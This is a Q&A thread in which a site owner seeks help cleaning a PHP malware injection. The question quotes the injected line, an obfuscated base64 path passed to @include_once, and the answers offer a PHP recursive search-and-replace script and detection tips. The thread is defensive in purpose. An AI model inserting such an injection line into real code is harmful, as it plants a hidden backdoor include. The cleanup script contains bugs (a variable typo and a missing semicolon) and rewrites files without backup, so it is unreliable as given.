Code to search for a specific code any file in a directory and sub directory

Question

Ok I am pretty new to php but I know it can read directorys and files.

I have been struggling with malware problem on one of our sites and I need to write a script to search for it on my host space.

The code the hackers are putting in the files is

*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>

I have no idea what this is but google blocks my site when this shows up.

I have to download all the files then search it in dreamweaver replace this crap with a space and put it back.

I need a script to detect this before google does.

If any one can give me some pointers it will be great

I am sure this is a problem that everyone will face now or later.

on a seperate file echo base decode $DUOIEK to see what they were tryin to do — Ibu, May 11 '11 at 08:40
[How To Use Search and Replace in Dreamweaver](http://webdesign.about.com/od/dreamweaverhowtos/ht/dw_find_replace.htm) — Gordon, May 11 '11 at 08:42
One suggestion... Try to make sure that this never happens again, and I have faced this malware also.. and it was due to FTP client (cuteFTP) which I was using. I had saved password in that. whenever i connect to the server it add this chunk of code in all index.php files. so change your password, and clean your system. — Muhammad Ummar, May 11 '11 at 09:31
I've also experienced it, most likely because of the Filemanager in osCommerce. — Joshua - Pendo, May 13 '11 at 07:40

score 1 · Answer 1 · answered May 11 '11 at 08:52

Pure PHP solution that will find and replace the string you provided. Alternatively, you can just obtain files that have been modified. Note: if you use this code, there is NO UNDO option, you're using it on your own risk.

$dir = '/your_dir/';
$searchstring = '*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>'

$iterator = new RecursiveDirectoryIterator($dir);

foreach (new RecursiveIteratorIterator($iterator) as $filename => $cur) 
{
    // Search and replace

    $contents = file_get_contents($filename);   
    $contents = str_replace($searchstring, ' ', $content);  
    file_put_contents($filename, $contents);

    // Alternatively, you can do this (instead of search and replace)

    if(strpos($contents, $searchstring) !== false)
    {
        $infected[] = $filename; // gives you an array that gives you paths to files that contain the injected code.
    }
}

You can run the script either from browser or command line. I'm not saying this is the best option tho.

Adding an undo function wouldn't be that hard ;-) Simply writing a filename.php.bck with the contents you got before replacing all. — Joshua - Pendo, May 13 '11 at 07:39

score 0 · Answer 2 · answered May 11 '11 at 08:40

Download all with your FTP and run a find & replace for a complete directory (dreamweaver supports complete directories). I've had this problem once aswel, you might wanna look for javascript hacks in your code aswell, they tend to do javascript includes also.

The hack code tries to include this file:

/home/users/web/b1643/sl.thechess/public_html/MedcourtBackupoct2007/MedcourtBackupoct2007-2/b2b customer/Bubblepost Back up/public_html/Backups/Mediasuface 2005/Help and documentation/java api/JavaAPI/com/mediasurface/datatypes/searching/class-use/tsdeo.php

What this is? I don't know, but that's what it's trying to do. So you might consider this hack to be done from inside the server you're hosted on I think.

yes i converted the base code and found this the file was opening a list of redirects something like a spamed search page. I am deleting the whole medcourtBackupoct file and then will try the script above. I have done the download and replace thing atleast 3 times its a 5 GB host and i have to clean everything it comes back in a month. This file may be the casuse of it. There were 2 more files in the folder. Thanks — mindmyweb, May 13 '11 at 04:07

score 0 · Answer 3 · answered May 11 '11 at 08:40

0

If you have SSH access you can use a command like this just replace "eval(base64_decode" with "base64_decode".

If not you will want to write a script that does a recursive loop through all of your files with readdir and then use some strpos magic to detect "base64_decode".

And if your really having problems I would recommend a 3rd party service like sucuri.

Good luck!

answered May 11 '11 at 08:40

fire

21,383
17
79
114

Yes this does get me on the right track . I tried to install a third party service like site lock but that is rediculus they are asking 20 usd to clean 1 file. Only someone really stupid would pay that much . – mindmyweb May 13 '11 at 04:12

Code to search for a specific code any file in a directory and sub directory

3 Answers3